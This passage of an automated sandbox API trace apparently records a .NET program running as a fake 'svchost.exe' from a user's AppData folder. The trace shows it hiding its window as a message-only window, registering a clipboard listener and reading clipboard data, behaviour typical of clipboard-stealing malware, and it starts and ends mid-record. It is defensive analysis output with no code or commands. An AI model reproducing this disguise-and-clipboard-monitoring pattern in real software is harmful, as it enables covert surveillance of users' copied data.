0x301de [0155.311] SetWindowLongPtrW (hWnd=0x301de, nIndex=-4, dwNewLong=0x7785b0ac) returned 0x1ae3141c [0155.311] GetWindowLongPtrW (hWnd=0x301de, nIndex=-4) returned 0x7785b0ac [0155.311] SetWindowLongPtrW (hWnd=0x301de, nIndex=-4, dwNewLong=0x1ae314bc) returned 0x7785b0ac [0155.311] GetWindowLongPtrW (hWnd=0x301de, nIndex=-4) returned 0x1ae314bc [0155.311] GetWindowLongPtrW (hWnd=0x301de, nIndex=-16) returned 0x6cf0000 [0155.602] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x81, wParam=0x0, lParam=0x1affe440) returned 0x1 [0155.604] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x83, wParam=0x0, lParam=0x1affe4f0) returned 0x0 [0155.605] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x1, wParam=0x0, lParam=0x1affe440) returned 0x0 [0155.605] GetClientRect (in: hWnd=0x301de, lpRect=0x1affde90 | out: lpRect=0x1affde90) returned 1 [0155.605] GetWindowRect (in: hWnd=0x301de, lpRect=0x1affde90 | out: lpRect=0x1affde90) returned 1 [0155.616] GetProcessWindowStation () returned 0x44 [0155.617] GetUserObjectInformationA (in: hObj=0x44, nIndex=1, pvInfo=0x24cc0e8, nLength=0xc, lpnLengthNeeded=0x1affdc10 | out: pvInfo=0x24cc0e8, lpnLengthNeeded=0x1affdc10) returned 1 [0155.619] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x458 [0155.642] GetStartupInfoW (in: lpStartupInfo=0x24cc9b8 | out: lpStartupInfo=0x24cc9b8*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0155.643] GetParent (hWnd=0x301de) returned 0x0 [0155.643] SetWindowLongPtrW (hWnd=0x301de, nIndex=-8, dwNewLong=0x0) returned 0x0 [0155.658] GetSystemMetrics (nIndex=11) returned 32 [0155.659] GetSystemMetrics (nIndex=12) returned 32 [0155.660] GetDC (hWnd=0x0) returned 0x16010b49 [0155.668] GetDeviceCaps (hdc=0x16010b49, index=12) returned 32 [0155.669] GetDeviceCaps (hdc=0x16010b49, index=14) returned 1 [0155.669] ReleaseDC (hWnd=0x0, hDC=0x16010b49) returned 1 [0155.670] CreateIconFromResourceEx (presbits=0x24cf9f0, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x90075 [0155.671] GetSystemMetrics (nIndex=49) returned 16 [0155.671] GetSystemMetrics (nIndex=50) returned 16 [0155.673] CreateIconFromResourceEx (presbits=0x24d0af8, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x4022d [0155.676] SendMessageW (hWnd=0x301de, Msg=0x80, wParam=0x0, lParam=0x4022d) returned 0x0 [0155.676] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x80, wParam=0x0, lParam=0x4022d) returned 0x0 [0155.676] SendMessageW (hWnd=0x301de, Msg=0x80, wParam=0x1, lParam=0x90075) returned 0x0 [0155.676] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x80, wParam=0x1, lParam=0x90075) returned 0x0 [0155.677] GetSystemMenu (hWnd=0x301de, bRevert=0) returned 0x4022f [0155.680] GetWindowPlacement (in: hWnd=0x301de, lpwndpl=0x1affed78 | out: lpwndpl=0x1affed78) returned 1 [0155.681] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0155.681] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0155.681] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0155.681] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0155.681] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0155.681] GetClientRect (in: hWnd=0x301de, lpRect=0x1affee48 | out: lpRect=0x1affee48) returned 1 [0155.681] GetClientRect (in: hWnd=0x301de, lpRect=0x1affed60 | out: lpRect=0x1affed60) returned 1 [0155.681] GetWindowRect (in: hWnd=0x301de, lpRect=0x1affed60 | out: lpRect=0x1affed60) returned 1 [0155.681] GetWindowLongPtrW (hWnd=0x301de, nIndex=-16) returned 0x6cf0000 [0155.682] GetWindowTextLengthW (hWnd=0x301de) returned 0 [0155.682] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0155.682] GetSystemMetrics (nIndex=42) returned 0 [0155.682] GetWindowTextW (in: hWnd=0x301de, lpString=0x1affeb50, nMaxCount=1 | out: lpString="") returned 0 [0155.682] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0xd, wParam=0x1, lParam=0x1affeb50) returned 0x0 [0155.683] GetWindowTextLengthW (hWnd=0x301de) returned 0 [0155.683] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0155.683] GetSystemMetrics (nIndex=42) returned 0 [0155.683] GetWindowTextW (in: hWnd=0x301de, lpString=0x1affeb50, nMaxCount=1 | out: lpString="") returned 0 [0155.683] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0xd, wParam=0x1, lParam=0x1affeb50) returned 0x0 [0155.684] GetWindowLongPtrW (hWnd=0x301de, nIndex=-16) returned 0x6cf0000 [0155.684] GetWindowLongPtrW (hWnd=0x301de, nIndex=-20) returned 0x50180 [0155.684] SetWindowLongPtrW (hWnd=0x301de, nIndex=-16, dwNewLong=0x2cf0000) returned 0x6cf0000 [0155.684] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x7c, wParam=0xfffffffffffffff0, lParam=0x1affec50) returned 0x0 [0155.684] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x7d, wParam=0xfffffffffffffff0, lParam=0x1affec50) returned 0x0 [0155.684] SetWindowLongPtrW (hWnd=0x301de, nIndex=-20, dwNewLong=0x50080) returned 0x50180 [0155.684] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0x1affec50) returned 0x0 [0155.684] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0x1affec50) returned 0x0 [0155.684] SetWindowPos (hWnd=0x301de, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0155.684] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x46, wParam=0x0, lParam=0x1affeca0) returned 0x0 [0155.685] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x83, wParam=0x1, lParam=0x1affec70) returned 0x0 [0155.685] GetWindowPlacement (in: hWnd=0x301de, lpwndpl=0x1affe7f8 | out: lpwndpl=0x1affe7f8) returned 1 [0155.685] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x47, wParam=0x0, lParam=0x1affeca0) returned 0x0 [0155.685] GetClientRect (in: hWnd=0x301de, lpRect=0x1affe6c0 | out: lpRect=0x1affe6c0) returned 1 [0155.685] GetWindowRect (in: hWnd=0x301de, lpRect=0x1affe6c0 | out: lpRect=0x1affe6c0) returned 1 [0155.688] RedrawWindow (hWnd=0x301de, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0155.690] GetSystemMenu (hWnd=0x301de, bRevert=0) returned 0x4022f [0155.690] GetWindowPlacement (in: hWnd=0x301de, lpwndpl=0x1affed18 | out: lpwndpl=0x1affed18) returned 1 [0155.690] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0155.690] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0155.690] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0155.690] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0155.690] EnableMenuItem (hMenu=0x4022f, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0155.701] SetParent (hWndChild=0x301de, hWndNewParent=0xfffffffffffffffd) returned 0x10010 [0155.701] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x46, wParam=0x0, lParam=0x1affeeb0) returned 0x0 [0155.711] AddClipboardFormatListener (hwnd=0x301de) returned 1 [0155.784] ShowWindow (hWnd=0x301de, nCmdShow=5) returned 0 [0155.786] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0155.791] GetWindowThreadProcessId (in: hWnd=0x301de, lpdwProcessId=0x1affe570 | out: lpdwProcessId=0x1affe570) returned 0xa10 [0155.791] GetCurrentThreadId () returned 0xa10 [0155.792] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1c3 [0155.792] PostMessageW (hWnd=0x301de, Msg=0xc1c3, wParam=0x0, lParam=0x0) returned 1 [0155.795] GetWindowTextLengthW (hWnd=0x301de) returned 0 [0155.795] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0155.795] GetSystemMetrics (nIndex=42) returned 0 [0155.795] GetWindowTextW (in: hWnd=0x301de, lpString=0x1affe480, nMaxCount=1 | out: lpString="") returned 0 [0155.795] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0xd, wParam=0x1, lParam=0x1affe480) returned 0x0 [0155.798] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x46, wParam=0x0, lParam=0x1affecb0) returned 0x0 [0155.799] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x46, wParam=0x0, lParam=0x1affecb0) returned 0x0 [0155.799] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0155.804] OleInitialize (pvReserved=0x0) returned 0x80010106 [0155.805] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x1affe838 | out: lplpMessageFilter=0x1affe838*=0x0) returned 0x80004021 [0155.813] SetFocus (hWnd=0x301de) returned 0x0 [0155.819] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0155.820] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0155.822] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0155.824] GetParent (hWnd=0x301de) returned 0x0 [0155.824] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0155.827] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0155.845] GetWindowPlacement (in: hWnd=0x301de, lpwndpl=0x1affe808 | out: lpwndpl=0x1affe808) returned 1 [0155.845] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x47, wParam=0x0, lParam=0x1affecb0) returned 0x0 [0155.845] GetClientRect (in: hWnd=0x301de, lpRect=0x1affe6d0 | out: lpRect=0x1affe6d0) returned 1 [0155.845] GetWindowRect (in: hWnd=0x301de, lpRect=0x1affe6d0 | out: lpRect=0x1affe6d0) returned 1 [0155.847] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x5, wParam=0x0, lParam=0x10a011c) returned 0x0 [0155.847] CallWindowProcW (lpPrevWndFunc=0x7785b0ac, hWnd=0x301de, Msg=0x3, wParam=0x0, lParam=0xe200d0) returned 0x0 [0155.847] GetClientRect (in: hWnd=0x301de, lpRect=0x1affe760 | out: lpRect=0x1affe760) returned 1 [0155.847] GetWindowRect (in: hWnd=0x301de, lpRect=0x1affe760 | out: lpRect=0x1affe760) returned 1 [0155.849] PeekMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x1affee50) returned 1 [0155.850] IsWindowUnicode (hWnd=0x301de) returned 1 [0155.850] GetMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1affee50) returned 1 [0155.854] TranslateMessage (lpMsg=0x1affee50) returned 0 [0155.854] DispatchMessageW (lpMsg=0x1affee50) returned 0x0 [0155.858] PeekMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x1affee50) returned 0 [0155.858] PeekMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x1affee50) returned 0 [0155.859] WaitMessage () returned 1 [0156.128] PeekMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x1affee50) returned 1 [0156.128] IsWindowUnicode (hWnd=0x2031a) returned 1 [0156.128] GetMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1affee50) returned 1 [0156.128] TranslateMessage (lpMsg=0x1affee50) returned 0 [0156.128] DispatchMessageW (lpMsg=0x1affee50) returned 0x0 [0156.128] PeekMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x1affee50) returned 0 [0156.128] PeekMessageW (in: lpMsg=0x1affee50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x1affee50) returned 0 [0156.128] WaitMessage () Thread: id = 153 os_tid = 0xa14 [0155.371] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0155.394] GetCurrentProcess () returned 0xffffffffffffffff [0155.394] GetCurrentThread () returned 0xfffffffffffffffe [0155.394] GetCurrentProcess () returned 0xffffffffffffffff [0155.394] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1ba3ea50, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1ba3ea50*=0x454) returned 1 [0155.394] GetCurrentThreadId () returned 0xa14 [0155.397] OleInitialize (pvReserved=0x0) returned 0x0 [0155.402] OleGetClipboard (in: ppDataObj=0x1ba3ea58 | out: ppDataObj=0x1ba3ea58*=0x1bc13730) returned 0x0 [0155.404] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23b8508*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ba3e288 | out: ppvObject=0x1ba3e288*=0x1bc13730) returned 0x0 [0155.405] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23c6968*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1ba3e330 | out: ppvObject=0x1ba3e330*=0x0) returned 0x80004002 [0155.405] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23c69a8*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1ba3df58 | out: ppvObject=0x1ba3df58*=0x0) returned 0x80004002 [0155.406] IUnknown:AddRef (This=0x1bc13730) returned 0x3 [0155.406] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23c6978*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1ba3d9d8 | out: ppvObject=0x1ba3d9d8*=0x0) returned 0x80004002 [0155.406] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23c6988*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1ba3d960 | out: ppvObject=0x1ba3d960*=0x0) returned 0x80004002 [0155.406] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23c5de0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ba3d950 | out: ppvObject=0x1ba3d950*=0x0) returned 0x80004002 [0155.406] CoGetContextToken (in: pToken=0x1ba3da00 | out: pToken=0x1ba3da00) returned 0x0 [0155.406] CObjectContext::QueryInterface () returned 0x0 [0155.406] CObjectContext::GetCurrentApartmentType () returned 0x0 [0155.406] Release () returned 0x0 [0155.407] CoGetObjectContext (in: riid=0x7fef23b8508*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1bc11878 | out: ppv=0x1bc11878*=0xd66750) returned 0x0 [0155.450] CoGetContextToken (in: pToken=0x1ba3de80 | out: pToken=0x1ba3de80) returned 0x0 [0155.450] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x7fef23c6998*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ba3df40 | out: ppvObject=0x1ba3df40*=0x0) returned 0x80004002 [0155.451] IUnknown:Release (This=0x1bc13730) returned 0x2 [0155.451] CoGetContextToken (in: pToken=0x1ba3e550 | out: pToken=0x1ba3e550) returned 0x0 [0155.451] CoGetContextToken (in: pToken=0x1ba3e450 | out: pToken=0x1ba3e450) returned 0x0 [0155.451] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x1ba3e5b0*(Data1=0x10e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ba3e580 | out: ppvObject=0x1ba3e580*=0x1bc13730) returned 0x0 [0155.451] IUnknown:AddRef (This=0x1bc13730) returned 0x4 [0155.451] IUnknown:Release (This=0x1bc13730) returned 0x3 [0155.452] IUnknown:Release (This=0x1bc13730) returned 0x2 [0155.452] CoGetContextToken (in: pToken=0x1ba3e650 | out: pToken=0x1ba3e650) returned 0x0 [0155.453] CoGetContextToken (in: pToken=0x1ba3e550 | out: pToken=0x1ba3e550) returned 0x0 [0155.453] IUnknown:QueryInterface (in: This=0x1bc13730, riid=0x1ba3e6b0*(Data1=0x3cee8cc1, Data2=0x1adb, Data3=0x327f, Data4=([0]=0x9b, [1]=0x97, [2]=0x7a, [3]=0x9c, [4]=0x80, [5]=0x89, [6]=0xbf, [7]=0xb3)), ppvObject=0x1ba3e680 | out: ppvObject=0x1ba3e680*=0x0) returned 0x80004002 [0155.509] IDataObject:QueryGetData (This=0x1bc13730, pformatetc=0x1ba3ea28) returned 0x0 [0155.515] IDataObject:RemoteGetData (in: This=0x1bc13730, pformatetcIn=0x1ba3ea28, pRemoteMedium=0x1ba3e940 | out: pRemoteMedium=0x1ba3e940) returned 0x0 [0155.525] GlobalLock (hMem=0x1b480018) returned 0xe4ff60 [0155.526] GlobalUnlock (hMem=0x1b480018) returned 0 [0155.526] CoGetContextToken (in: pToken=0x1ba3f1d0 | out: pToken=0x1ba3f1d0) returned 0x0 [0155.528] CoGetContextToken (in: pToken=0x1ba3e7b0 | out: pToken=0x1ba3e7b0) returned 0x0 [0155.528] CoGetContextToken (in: pToken=0x1ba3e6a0 | out: pToken=0x1ba3e6a0) returned 0x0 [0155.528] IUnknown:Release (This=0x1bc13730) returned 0x1 [0155.529] IUnknown:Release (This=0x1bc13730) returned 0x0 [0155.529] IUnknown:Release (This=0xd66750) returned 0x0 [0155.529] CoUninitialize () Thread: id = 154 os_tid = 0xa18 Thread: id = 155 os_tid = 0xa1c [0155.626] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0155.629] SetConsoleCtrlHandler (HandlerRoutine=0x1ae3150c, Add=1) returned 1 [0155.629] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0155.630] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0155.632] GetClassInfoW (in: hInstance=0xe70000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.2b7afa0.0", lpWndClass=0x24cc358 | out: lpWndClass=0x24cc358) returned 0 [0155.633] CoTaskMemAlloc (cb=0x58) returned 0x1bc14cf0 [0155.633] RegisterClassW (lpWndClass=0x1bf0ebe0) returned 0xc1c2 [0155.633] CoTaskMemFree (pv=0x1bc14cf0) [0155.635] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.2b7afa0.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.2b7afa0.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x30324 [0155.636] NtdllDefWindowProc_W () returned 0x1 [0155.637] NtdllDefWindowProc_W () returned 0x0 [0155.637] NtdllDefWindowProc_W () returned 0x0 [0155.637] NtdllDefWindowProc_W () returned 0x0 [0155.637] NtdllDefWindowProc_W () returned 0x0 [0155.639] SetEvent (hEvent=0x458) returned 1 [0155.645] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0155.804] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0155.925] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.063] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.177] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.299] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.424] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.549] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.678] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.800] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0156.924] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.058] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.178] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.298] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.422] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.550] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.672] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.797] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0157.922] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.063] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.188] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.312] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.436] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.561] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.686] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.811] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0158.936] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.072] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.185] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.311] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.435] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.560] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.685] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.810] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0159.934] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.073] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.184] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.309] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.433] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.558] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, 